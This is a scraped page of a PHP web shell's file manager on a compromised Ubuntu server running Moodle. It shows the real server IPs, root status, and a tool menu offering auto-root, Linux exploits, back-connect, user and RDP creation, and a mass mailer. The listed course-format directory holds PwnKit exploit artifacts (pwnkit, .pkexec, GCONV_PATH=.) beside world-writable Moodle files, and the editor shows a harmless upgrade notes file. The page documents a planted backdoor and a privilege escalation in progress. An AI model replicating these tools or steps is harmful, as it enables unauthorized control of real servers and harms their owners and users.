Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
course /
format /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
scorm
[ DIR ]
drwxrwxrwx
social
[ DIR ]
drwxrwxrwx
topics
[ DIR ]
drwxrwxrwx
weeks
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
3.88
KB
-rwxrwxrwx
formatlegacy.php
14.51
KB
-rwxrwxrwx
lib.php
36.45
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
34.28
KB
-rwxrwxrwx
upgrade.txt
1.99
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes for course formats Overview of this plugin type at http://docs.moodle.org/dev/Course_formats === 2.5 === * Functions responsible for output in course/lib.php are deprecated, the code is moved to appropriate renderers: print_section(), print_section_add_menus(), get_print_section_cm_text(), make_editing_buttons() See functions' phpdocs in lib/deprecatedlib.php * Function get_print_section_cm_text() is deprecated, replaced with methods in cm_info === 2.4 === Course format API has been changed significantly. Instead of implementing callbacks course formats may overwrite the class format_base. See format_legacy class for a template for upgrading course format. * Function settings_navigation::add_course_editing_links() is completely removed, course format functions callback_XXXX_request_key() are no longer used (where XXXX is the course format name) * functions get_generic_section_name(), get_all_sections(), add_mod_to_section(), get_all_mods() are deprecated. See their phpdocs in lib/deprecatedlib.php on how to replace them * Course formats may now have their settings.php file as the most of other plugin types * Function format_section_renderer_base::is_section_current() is deprecated, overwrite/use function is_section_current in format class === 2.3 === * The new $course->coursedisplay option was introduced, users can now choose to display a section at a time if the course formats support it: - COURSE_DISPLAY_SINGLEPAGE indicates the teacher has chosen to display all sections on one page - COURSE_DISPLAY_MULTIPAGE indicates the teacher has chose to have seperate pages with each section. * The parameter for 'currently active section' was standardised in core: - The course format is passed the currently live section through the $displaysection varaible to format.php - A 'section' paramter is the standardised way to pass around the current section in a course - Navigation no longer looks for custom parameters defined in callback_format_request_key
Close